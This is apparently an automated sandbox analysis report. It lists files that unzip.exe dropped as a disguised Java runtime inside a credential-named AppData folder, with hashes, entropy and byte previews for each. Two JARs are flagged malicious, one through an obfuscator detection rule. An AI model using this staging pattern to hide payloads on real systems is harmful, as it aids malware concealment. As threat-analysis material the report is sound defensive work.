Preview:	## Apache XML Commons Resolver v1.2..### Apache XML Commons Resolver Notice..```..Apache XML Commons Resolver.Copyright 2006 The Apache Software Foundation...This product includes software developed at.The Apache Software Foundation http://www.apache.org/..Portions of this code are derived from classes placed in the.public domain by Arbortext on 10 Apr 2000. See:.http://www.arbortext.com/customer_support/updates_and_technical_notes/catalogs/docs/README.htm.```..### Apache 2.0 License.```.. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/..TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION..1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\zlib.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1010
Entropy (8bit):	4.58840660413188
Encrypted:	false
SSDEEP:	24:jDxuyMlc/LxAbno0QNplTp4XGBi+g7Y8PaO:LCc/LebnN63Tp4X4i/7ZSO
MD5:	018777DC4651AC69C58D3FACB3CDD1C0
SHA1:	16825413E498C113D88FC2A716DCB4C8C7609B98
SHA-256:	809B62BA648E02302F7D9EA6B6886C10D5253AC86AD528038A50C73EADA5FCE2
SHA-512:	D5441B256EA55B68FB28A3546A8D5BD24D89A551222745933C23C02B917A3955469064EEED3CCBE2764FF158F2A472AAD5B9B3F91190FFEFAB9F6B2682A75A4D
Malicious:	false
Preview:	## zlib v1.3.1..### zlib License.<pre>..Copyright (C) 1995-2024 Jean-loup Gailly and Mark Adler..This software is provided 'as-is', without any express or implied.warranty. In no event will the authors be held liable for any damages.arising from the use of this software...Permission is granted to anyone to use this software for any purpose,.including commercial applications, and to alter it and redistribute it.freely, subject to the following restrictions:..1. The origin of this software must not be misrepresented; you must not. claim that you wrote the original software. If you use this software. in a product, an acknowledgment in the product documentation would be. appreciated but is not required..2. Altered source versions must be plainly marked as such, and must not be. misrepresented as being the original software..3. This notice may not be removed or altered from any source distribution...Jean-loup Gailly Mark Adler.jloup@gzip.org madler@alumni.caltech.ed

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\accessibility.properties

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	149
Entropy (8bit):	4.558376029276625
Encrypted:	false
SSDEEP:	3:LFpfBZgZLXnuWxVEzERMLVAAiuKIn7IRAdSPGGzJzGBXlnfMaAHCR1vn:L7APWzTLVAkIiSPhZGBX5kaAHCXn
MD5:	2ED483DF31645D3D00C625C00C1E5A14
SHA1:	27C9B302D2D47AAE04FC1F4EF9127A2835A77853
SHA-256:	68EF2F3C6D7636E39C6626ED1BD700E3A6B796C25A9E5FECA4533ABFACD61CDF
SHA-512:	4BF6D06F2CEAF070DF4BD734370DEF74A6DD545FD40EFD64A948E1422470EF39E37A4909FEEB8F0731D5BADB3DD9086E96DACE6BDCA7BBD3078E8383B16894DA
Malicious:	false
Preview:	#.# Load the Java Access Bridge class into the JVM.#.#assistive_technologies=com.sun.java.accessibility.AccessBridge.#screen_magnifier_present=true..

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\applet\1.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	4324190
Entropy (8bit):	7.934343223028602
Encrypted:	false
SSDEEP:	98304:BPQQbF+QCYlLrBSEcz2uNkXtUoPvrlYxoHmFvDvDeh7:FQe5KD/Mt/vWxoHA7vq9
MD5:	04C1C03B037268D45E2E6197116A8574
SHA1:	953D47B5AD498763C64B8F2C9EAA82D2CD43E3AE
SHA-256:	CA6DBEAA3767A924FE88C2E4FEB5CBBD10697A7EFD9FC09C03D2202EDA311191
SHA-512:	CB7BDCC256EC4B7200691DA98A46F79EC43A0A92D559A55FB8463F7A97947B28775C255F5FE74E8692BE345CD1544292F3D01793B51E59C8C46C437EEC01F475
Malicious:	false
Preview:	PK.........`#Z............"...com/sun/jna/platform/unix/solaris/UT.....wg....PK.........`#Z................com/sun/jna/aix-ppc64/UT.....wgPK.........`#Z............,...com/sun/jna/openbsd-x86-64/libjnidispatch.soUT.....wg.w\|........Q."..E..T....)4.`.l.E...0..M.}\|.V...@.Aq......D...._..'.QvY.{.._..~.^>.>..{.=..s....._..hP.E.z....e...>.K-MoC.!.....zJk2..oJsc._..B.G(.~S....C....B.....o...[..M.........%.U.d...mB....S.......~.#..... .K............o.......JS.xG.}8...U..`9...Re.(......g.......c[l...Ly..6.`...y./...I.4P...mG!.J...<.a4......G#...>.......0.j ..;.."., ...X.....0.c`<.7"....7E.!..n.p#.....pc.....%>).a..g.n....c.c..T. \|.a..O.^..I~...nJ......H~.."..'x..V....nN......I~.?@8..'.-.o ..~...I~._@...O.s..$..~..V$?...nM.....7....~..D...Q..!......$?......'...I$?.=.nK..\|'....w@.6.....nG..\|#..I~.."..'.!..I~......'..'.w"..>.pg...c..A._..G...O.^..I~......'x..]I~.."..'x..)$?._!\|..O.J....'...SI~..B.;.O... ..~..I~..C.'.O.S.....OG...O.c..C._..G.7.O.(..I~..#..'.?.}I~.. .A

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\applet\2.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	7427570
Entropy (8bit):	7.97694488659184
Encrypted:	false
SSDEEP:	196608:W2CLsQwxjaKsbjWT4+ek/LIYKj9Iyx1PVN8AlHu:W2PQwNSjC5DueWTNbO
MD5:	FA884054F7D49D193A9E9196AC6A1615
SHA1:	04C725395C9CCD89CF49DF10D0C00DA8398AF38D
SHA-256:	773B1C5B495CADCD0853B16DB554164E65096E5711A286A2CC089ADA7A646789
SHA-512:	A0F268003030F8A21047EE4C4AA468C1359234CEE52C4112B98BA0CEE85AC6D66B4B68875914C45C03FE0BBADAFB9F9A0EB07942CCBE978E0FDA06B1206A2B0F
Malicious:	false
Preview:	PK.........b#Z............:...IIllIlIlI/lIIllIlIl/IIlIlI/IlIlIll/lIlIlIIIIIlllIllI.class..mO.P....u+.C&8....G..d.!...&<.X.e.b)PI.f5[Y..J. 1....e<...c,f........s.......Xc.&...}5L. G......p..6Zd`7.p...1DV.....d..#.......&.{..V.2..<2v.......2LH......O..G.q..1.F."....U\gX.%X...E.M.XWK.n9.w>[..V1....b.aq..._c..6.c.ajh=.^......._...P...M.....k.b..o..s/....2...m..pO..}.z4Z).].....c..s....#.........?..a2u.#.a.)..#.;..2....i.Y.L]..?2.h5..X.p.....q..X.i..X...E.V.t.@B.....CR...."E).W.L..4..j.f&..o..*......W....p..Z...E......i..U.e....6B......O...^..S..!..w..../rg.$w...Z:.d.#.x...Fe...A....b.!.rOw9...../...J-..........].Nm...d.....>.+J-.".)...D.].<C`..PK.....LP...$...PK.........b#Z............:...IIllIlIlI/lIIllIlIl/IIlIlI/IlIlIll/lIlIIIIlIIlllIIIl.class.U.O.W......].a..d.D.(K.+..rS....P.\.<,."t.ZY.....U..McS.B...&BCI[k3.....6}h../.............d.9..\|...7........2..4]....S.f+.Q..\|.....%0..P.H8.......H.L....}..=h.JO.=O-...D..0d.<......=...........5.=.U...Fk.i

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\applet\3.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	202289
Entropy (8bit):	5.928444224897766
Encrypted:	false
SSDEEP:	1536:nK0CoWtHu/iSEAtr63zpK5PfynFugp7/8v:nK0CoAO/i0tVmuOgv
MD5:	873E978E5C705DF796AB6731595FBA30
SHA1:	88BA62DCE78359FF7F6F0EDAAEED88C6F6C3DDF9
SHA-256:	F92240185ABF62317800180ABA0FBDA19D8E494A693E5A223003F52A88E3DDA8
SHA-512:	CAF2794259FE376F23C1C560B614E5333A962F05ECAB427B4F6D28AF0455BE023A473EF6D91120B279676190CBB0F7CAFD77877076470C71526E98096958AFFE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_BranchlockObfuscator, Description: Yara detected Branchlock Obfuscator, Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\applet\3.jar, Author: Joe Security
Preview:	PK........l[.@................a/a/UT......O......PK..............PK........l[.@................a/a/a/UT......O..PK..............PK........l[.@................a/a/a/b/UT......O..PK..............PK........l[.@................a/a/a/a/UT......O..PK..............PK........yL.Y................config.txtUT.....Vg..K.DQ......w.Kj]ex..O+..>..3.l..F..D...Pz..4..?...........ms,.3C...Dq....4....&..(o..1.0\|.}...J...OX.+ o.>.u..rE+..!J.8.!.Q........fm..:2..3...g.3.G........PK...C%N.... ...PK........l[.@................a/UT......O..PK..............PK........yL.Y................META-INF/MANIFEST.MFUT.....Vg.....M..LK-...K-...R0.3..M...u.I,..RH.......PK...\....+...PK...........Y................././..class/mQ.J.P......i.>..MR%...U.*(..U.XR.T$.7..W.\....Aqm?A......m.J.,r3g.9s..._..`..].0k..v)..#y..6.iy.e..?s..c.;g.....-!~......3.....&.W]....... .......zV..n.!DX.zA...i..[.h..<...C..... .~B...ZB..j..M....u....1.q..a....[...1.).....e..h..`..2..#$:...>).....B3?.....0!a.+Q5..{.

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\calendars.properties

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1482
Entropy (8bit):	5.175972768583767
Encrypted:	false
SSDEEP:	24:QVDBgkjOOVul8DbeQ1N3s5MCmCkcJF+DK+Obv:KqOVu2HX1C5MCmCkcJFvRL
MD5:	3F731B169E01A9EFE3E19A1F40679C9A
SHA1:	531A6316953FC152809601806FEC55E1BE806700
SHA-256:	1169FCBA1385B8E4BACCBD8156A43E3179C26E1877CC154BD16FF23874B208EA
SHA-512:	81C03E0B1CF93C873EA495CB6F434FA5FA41F02CFD7DC399E859C565E52E2E942E3ED04D4025F1E4F114DDB180503A5F97FF88FD4C41BB1C810AFB0F03B93EC6
Malicious:	false
Preview:	# Copyright (c) 2005, 2013, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#..#.# Japanese imperial calendar.#.# Meiji since 1868-01-01 00:00:00 local time (Gregorian).# Taisho since 1912-07-30 00:00:00 local time (Gregorian).# Showa since 1926-12-25 00:00:00 local time (Gregorian).# Heisei since 1989-01-08 00:00:00 local time (Gregorian).# Reiwa since 2019-05-01 00:00:00 local time (Gregorian).calendar.japanese.type: LocalGregorianCalendar.calendar.japanese.eras: \..name=Meiji,abbr=M,since=-3218832000000; \..name=Taisho,abbr=T,since=-1812153600000; \..name=Showa,abbr=S,since=-1357603200000; \..name=Heisei,abbr=H,since=600220800000; \..name=Reiwa,abbr=R,since=1556668800000..#.# Taiwanese calendar.# Minguo since 1911-01-01 00:00:00 local time (Gregorian).calendar.taiwanese.type: LocalGregorianCalendar.calendar.taiwanese.eras: \..name=MinGuo,since=-1830384000

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\charsets.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Java archive data (JAR)
Category:	dropped
Size (bytes):	3039864
Entropy (8bit):	6.610708181787573
Encrypted:	false
SSDEEP:	49152:W2i5oz1nKd4AqdtG4Fh4fBqFLnvvwZlbIa6qK:W2i+zNfpFyGn3MlbI9
MD5:	7FFA98FDB69413AF0715C01D26697FFD
SHA1:	510130F86F4D94E433078294B684DA376AADAFEA
SHA-256:	776752932217C21F1A00EA808B10971B95A9816F02F1F5CD5CFC352ADE8DA3E1
SHA-512:	E807A47FFDEC52B5DE37AF7D43D3C83ADCD53B9B7C6527E9371B382D3ACDF506A95172821BD1FF71DD345B363950941D3AE10960BB8CF3144A27DEDC0318121A
Malicious:	false
Preview:	PK........HB>Y................META-INF/....PK........HB>Y....E...E.......META-INF/MANIFEST.MFManifest-Version: 1.0..Created-By: 1.7.0_291 (Oracle Corporation)....PK.........A>Y./..............sun/nio/cs/ext/Big5.class.......4....]..c..d............................................................................................................................................................................................................................................................................................................... !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~...........................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\classlist

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	84355
Entropy (8bit):	4.927199323446014
Encrypted:	false
SSDEEP:	1536:4X/nxfn5rxLyMznYolTzlff5OK3COHoHNG5rb/cxNwmCX1g86K2oWdAqNqc+KMjD:qxn5rxLyMzbf5OK3CJNG51g86A
MD5:	7FC71A62D85CCF12996680A4080AA44E
SHA1:	199DCCAA94E9129A3649A09F8667B552803E1D0E
SHA-256:	01FE24232D0DBEFE339F88C44A3FD3D99FF0E17AE03926CCF90B835332F5F89C
SHA-512:	B0B9B486223CF79CCF9346AAF5C1CA0F9588247A00C826AA9F3D366B7E2EF905AF4D179787DCB02B32870500FD63899538CF6FAFCDD9B573799B255F658CEB1D
Malicious:	false
Preview:	java/lang/Object..java/lang/String..java/io/Serializable..java/lang/Comparable..java/lang/CharSequence..java/lang/Class..java/lang/reflect/GenericDeclaration..java/lang/reflect/AnnotatedElement..java/lang/reflect/Type..java/lang/Cloneable..java/lang/ClassLoader..java/lang/System..java/lang/Throwable..java/lang/Error..java/lang/ThreadDeath..java/lang/Exception..java/lang/RuntimeException..java/lang/SecurityManager..java/security/ProtectionDomain..java/security/AccessControlContext..java/security/SecureClassLoader..java/lang/ClassNotFoundException..java/lang/ReflectiveOperationException..java/lang/NoClassDefFoundError..java/lang/LinkageError..java/lang/ClassCastException..java/lang/ArrayStoreException..java/lang/VirtualMachineError..java/lang/OutOfMemoryError..java/lang/StackOverflowError..java/lang/IllegalMonitorStateException..java/lang/ref/Reference..java/lang/ref/SoftReference..java/lang/ref/WeakReference..java/lang/ref/FinalReference..java/lang/ref/PhantomReference..sun/misc/Cleaner

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\cmm\CIEXYZ.pf

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Sun KCMS color profile 2.0, type KCMS, XYZ/XYZ-spac device, 51236 bytes, 2-12-1997 18:50:04, dependently, PCS X=0xf6b3 Z=0xd2f8 "XYZ to XYZ Identity Profile"
Category:	dropped
Size (bytes):	51236
Entropy (8bit):	7.226972359973779
Encrypted:	false
SSDEEP:	1536:2Qnt0y7xFNksbeCqY39JJ8GmaNo68GmaNo68GmaNoW:JOy7xXjtqYNfHxNo6HxNo6HxNoW
MD5:	10F23396E21454E6BDFB0DB2D124DB85
SHA1:	B7779924C70554647B87C2A86159CA7781E929F8
SHA-256:	207D748A76C10E5FA10EC7D0494E31AB72F2BACAB591371F2E9653961321FE9C
SHA-512:	F5C5F9FC3C4A940D684297493902FD46F6AA5248D2B74914CA5A688F0BAD682831F6060E2264326D2ECB1F3544831EB1FA029499D1500EA4BFE3B97567FE8444
Malicious:	false
Preview:	...$KCMS....spacXYZ XYZ .........2..acspSUNW....KODA.ODA............................................................................A2B0.......4B2A0.......4cprt.......Gwtpt...T....desc...h....K070........K071........mft2................................................................................................................ !!""##$$%%&&''(())++,,--..//00112233445566778899::;;<<==>>??@@AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTTUUVVWWXXYYZZ[[\\]]^^__``aabbccddeeffgghhiijjkkllmmnnooppqqrrssttuuvvwwxxyyzz{{\|\|}}~~.................................................................................................................................................................................................................................................................................................................................. !!""##$$%%&&''(())++,,--..//00112233445566778899::;;<<==>>??@@AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTTUUVVWWXXYYZZ[[\\]]^^__``aabbccddeeffgghhiijjkkllmm

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\cmm\GRAY.pf

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Sun KCMS color profile 2.0, type KCMS, GRAY/XYZ-mntr device, KODA/GRAY model, 632 bytes, 27-7-95 17:30:15, embedded, relative colorimetric, PCS Z=0xd32b "KODAK Grayscale Conversion - Gamma 1.0"
Category:	dropped
Size (bytes):	632
Entropy (8bit):	3.7843698642539243
Encrypted:	false
SSDEEP:	12:51AP3fJgXQ531yqQac/lkgz42WlHlYujlOl9Fhl:vA2XQCqpUlkgzulHiXl3hl
MD5:	1002F18FC4916F83E0FC7E33DCC1FA09
SHA1:	27F93961D66B8230D0CDB8B166BC8B4153D5BC2D
SHA-256:	081CAAC386D968ADD4C2D722776E259380DCF78A306E14CC790B040AB876D424
SHA-512:	334D932D395B46DFC619576B391F2ADC2617E345AFF032B592C25E333E853735DA8B286EF7542EB19059CDE8215CDCEA147A3419ED56BDD6006CA9918D0618E1
Malicious:	false
Preview:	...xKCMS....mntrGRAYXYZ ._..........acspSUNW....KODAGRAY.......................+....................................................cprt.......?desc........dmnd.......`wtpt........kTRC........dmdd.......dtext....COPYRIGHT (c) 1997 Eastman Kodak, All rights reserved...desc.......'KODAK Grayscale Conversion - Gamma 1.0..................@...............~.......................~.......~..............desc........KODAK..................@..................................................,...,....XYZ ...............+curv............desc........Grayscale..................@..................................................,...,....

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\cmm\LINEAR_RGB.pf

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	color profile 2.0, type KCMS, RGB/XYZ-mntr device by KODK, 1044 bytes, 2-2-1998, PCS Z=0xd32c "linear sRGB"
Category:	dropped
Size (bytes):	1044
Entropy (8bit):	6.510788634170065
Encrypted:	false
SSDEEP:	6:zwuau/7De0/q98EAsBIMD/WvaKIV4R0/lCAEdD0WlV9AEdwKKt/n3knR3lfR/NHD:zw7ePB/rEAsBIkVuUlAYKu/nUnKw
MD5:	A387B65159C9887265BABDEF9CA8DAE5
SHA1:	7913274C2F73BAFCF888F09FF60990B100214EDE
SHA-256:	712036AA1951427D42E3E190E714F420CA8C2DD97EF01FCD0675EE54B920DB46
SHA-512:	359D9B57215855F6794E47026C06036B93710998205D0817C6E602B2A24DAEB92537C388F129407461FC60180198F02A236AEB349A17430ED7AC85A1E5F71350
Malicious:	false
Preview:	....KCMS....mntrRGB XYZ ............acsp........KODK...........................,KODK................................................cprt.......Hdesc...8....rXYZ........gXYZ........bXYZ........rTRC........gTRC........bTRC........wtpt........text....Copyright (c) Eastman Kodak Company, 1998, all rights reserved..desc........linear sRGB............l.i.n.e.a.r. .s.R.G.B.....linear sRGB........................................................XYZ ......m...6.....XYZ ......e........!XYZ ......#B...^...Kcurv........................................................................ !!""##$$%%&&''(())**++,,--..//00112233445566778899::;;<<==>>??@@AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTTUUVVWWXXYYZZ[[\\]]^^__``aabbccddeeffgghhiijjkkllmmnnooppqqrrssttuuvvwwxxyyzz{{\|\|}}~~..........................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\cmm\PYCC.pf

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Sun KCMS color profile 2.0, type KCMS, 3CLR/Lab-spac device, 274474 bytes, 6-11-1996 7:50:04, PCS X=0xf6b3 Z=0xd2f8 "Std Photo YCC Print"
Category:	dropped
Size (bytes):	274474
Entropy (8bit):	7.843290819622709
Encrypted:	false
SSDEEP:	6144:nJleRNRyAnAqNaADEJHeeeeevoAuaiqwV6sg0pUjRVgYgI:nJleRNRpN0j3qhjRC9I
MD5:	24B9DEE2469F9CC8EC39D5BDB3901500
SHA1:	4F7EED05B8F0EEA7BCDC8F8F7AAEB1925CE7B144
SHA-256:	48122294B5C08C69B7FE1DB28904969DCB6EDC9AA5076E3F8768BF48B76204D0
SHA-512:	D23CE2623DE400216D249602486F21F66398B75196E80E447143D058A07438919A78AE0ED2DDF8E80D20BD70A635D51C9FB300E9F08A4751E00CD21883B88693
Malicious:	false
Preview:	..0KCMS....spac3CLRLab .........2..acspSUNW....KODAnone............................................................................A2B0... ...4B2A0...T..f4cprt..-....Gdmnd..-....ndmdd...@...zwtpt........desc.......nK013../@....K019../L....K030../.....K031..0.....K070..0.....K071..0 ....mft2.....................................................K.S.8.....l.....0...3.........U.. .!h".$.%\&.'.)5y+.,..5/o0.1.3.4E5v6.7.8.:;S<z=.>.?.A.B,CLDkE.F.G.H.I.K.L!M7NLO`PsQ.R.S.T.U.V.W.X.Y.[.\.].^._%`,a2b8c=dAeEfHgJhLiMjMkMlLmKnIoFpCq@r;s7t1u,v%w.x.y.z.z.{.\|.}.~...............p.b.S.C.3.#..............~.j.U.@.+.............t.\.C............r.W.;...........p.R.3..........w.V.6.........l.J.'........v.R.-.......t.N.(.......f.?........v.N.%........U.+.......U.......z.N."......n.@.......Z.+......o.@.........P. .......\.+.......d.1...........................z.p.f.[.Q.G.=.3.). ........................ .!.".#.$.%.&{'s(k)d]+U,N-G.@/9021,2%3.4.5.6.7.8.8.9.:.;.<.=.>.?.@.A.B.C.D.E.F.

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\cmm\sRGB.pf

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Microsoft color profile 2.1, type Lino, RGB/XYZ-mntr device, IEC/sRGB model by HP, 3144 bytes, 9-2-1998 6:49:00 "sRGB IEC61966-2.1"
Category:	dropped
Size (bytes):	3144
Entropy (8bit):	7.026867070945169
Encrypted:	false
SSDEEP:	48:+FflsXlf/lulel4wlwx+6MjnNsvIYWiR5QkyTJbZPHXZ9u6gbVwyKzJgWjU:aN26MT0D5MdtbZPAVwzV0
MD5:	1D3FDA2EDB4A89AB60A23C5F7C7D81DD
SHA1:	9EAEA0911D89D63E39E95F2E2116EAEC7E0BB91E
SHA-256:	2B3AA1645779A9E634744FAF9B01E9102B0C9B88FD6DECED7934DF86B949AF7E
SHA-512:	16AAE81ACF757036634B40FB8B638D3EBA89A0906C7F95BD915BC3579E3BE38C7549EE4CD3F344EF0A17834FF041F875B9370230042D20B377C562952C47509B
Malicious:	false
Preview:	...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................view.........._.....

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\content-types.properties

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	5548
Entropy (8bit):	5.037985807321917
Encrypted:	false
SSDEEP:	96:r45Vf4fq7MBzO4pYEZ2MQ6KXr3NO0slzMX+W1CuHvvABbiAQ+xaW/ioLHTU+Wsch:r4KJO4mEZ2MQ6Cr3NO0slzMX+WIuHvvv
MD5:	F507712B379FDC5A8D539811FAF51D02
SHA1:	82BB25303CF6835AC4B076575F27E8486DAB9511
SHA-256:	46F47B3883C7244A819AE1161113FE9D2375F881B75C9B3012D7A6B3497E030A
SHA-512:	CB3C99883336D04C42CEA9C2401E81140ECBB7FC5B8EF3301B13268A45C1AC93FD62176AB8270B91528AC8E938C7C90CC9663D8598E224794354546139965DFE
Malicious:	false
Preview:	#sun.net.www MIME content-types table.#.# Property fields:.#.# <description> ::= 'description' '=' <descriptive string>.# <extensions> ::= 'file_extensions' '=' <comma-delimited list, include '.'>.# <image> ::= 'icon' '=' <filename of icon image>.# <action> ::= 'browser' \| 'application' \| 'save' \| 'unknown'.# <application> ::= 'application' '=' <command line template>.#..#.# The "we don't know anything about this data" type(s)..# Used internally to mark unrecognized types..#.content/unknown: description=Unknown Content.unknown/unknown: description=Unknown Data Type..#.# The template we should use for temporary files when launching an application.# to view a document of given type..#.temp.file.template: c:\\temp\\%s..#.# The "real" types..#.application/octet-stream: \..description=Generic Binary Stream;\..file_extensions=.saveme,.dump,.hqx,.arc,.obj,.lib,.bin,.exe,.zip,.gz..application/oda: \..description=ODA Document;\..file_extensions=.oda..application/pdf: \..de

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\currency.data

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	data
Category:	dropped
Size (bytes):	4153
Entropy (8bit):	3.2709016902071117
Encrypted:	false
SSDEEP:	48:HlWAFFGFSupi9Xb6OtF8iXh8kkC6/q0X8/bVdxeI0fBE:HlWAEi9Xb6OtDXh8kk4/pd9kC
MD5:	A1F6A7597FF23C6BCDC5B672922DACF8
SHA1:	99CA0D4C3EC02AFEDBFC24002CC8E72F03C9BB86
SHA-256:	367F28FA49ACD62013AE0B284261B62D39A52081BAD92283B1EE75ABCC19F48F
SHA-512:	78D68CAD85E334513F21E93DF50EA96C770DC03926A9A4A2E5993FDACB1B9D471CB950F9B2491149F7E0FA4A734260DFC39181294BE95662F1965902FBAA8122
Malicious:	false
Preview:	CurD..........................@C..,M...................... K...C..PF..4@...........R...........C......TF...........M..DL...C.......S..........<M...c...................C...C...A..........hK...C...M.......... O.......M..PC...C..........@E...............E..............`.......pX...O...........B...C.......O...D..............,J..........................................@J..............XO..........................................0C...........................O...........................................M.......A...............................................................C...O...................................................................O..........TK...........R...O..............8C...........................P.................. C..............................................`C..........PK......................0F..pE...................................Q...............................R.......Q...........c...Q...................................................................................C

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Java archive data (JAR)
Category:	dropped
Size (bytes):	5057301
Entropy (8bit):	6.568066288921227
Encrypted:	false
SSDEEP:	49152:aa/lFE0OSJ+vH8Fi7pmb7kfBIp59KuKuYjww5AtEEI:f5W8wqtER
MD5:	DFDFEF8829AAF8F6476139AAA40D5262
SHA1:	9033352693E2B57BFE49362062895E782D4A6481
SHA-256:	A1C75BC2D9B64A6D528C32DD2F8FBD99D7D620FC371345D8CC07ECA7678DE4BA
SHA-512:	FD707D41F49AA497F4E14FE740DF9F24BE14583DA526EA8DA03C632BD286B8DD460626BE2462C155698B2BA2129BBB2E24BF03FBC515A9E357D8C3C392739256
Malicious:	false
Preview:	PK........nB>Y................META-INF/....PK........mB>YF.Wi...i.......META-INF/MANIFEST.MFManifest-Version: 1.0..Ant-Version: Apache Ant 1.10.6..Created-By: 1.8.0_431-b10 (Oracle Corporation)....PK........lB>Y................com/PK........lB>Y................com/oracle/PK........lB>Y................com/oracle/deploy/PK........mB>Y................com/oracle/deploy/update/PK........lB>Y................com/sun/PK........lB>Y................com/sun/applet2/PK........lB>Y................com/sun/applet2/preloader/PK........lB>Y............ ...com/sun/applet2/preloader/event/PK........mB>Y................com/sun/deploy/PK........lB>Y................com/sun/deploy/appcontext/PK........lB>Y................com/sun/deploy/association/PK........mB>Y............#...com/sun/deploy/association/utility/PK........lB>Y................com/sun/deploy/cache/PK........mB>Y................com/sun/deploy/config/PK........mB>Y................com/sun/deploy/jardiff/PK........lB>Y................com/sun/deplo

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\checker.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	9821
Entropy (8bit):	7.950996437027815
Encrypted:	false
SSDEEP:	192:KnmkoocBwK7BqEHV1EIArAV2mJI3LIbz6dRU8gEP4iAzuxh:PnX7R2IAMV2mJLmdurEPjH
MD5:	397EC026FD0750FCC02163A0642AE95F
SHA1:	3ED4787C5CAA08B0CBEAF20D6F3B08F0122B446D
SHA-256:	58242C906A137DE6BAA3818B334FB7410BC652A95589794EA728AA5EEAF26EE2
SHA-512:	7D7A85C89ECAE1D4A5A6B0C0EE0D2D79F91245DA9603D820CD2D0B7F3C67F3338D845B890CDB9FFC86F59C0759754BC91A9B2697A464A8E3F7EEC4BFB2AE007A
Malicious:	true
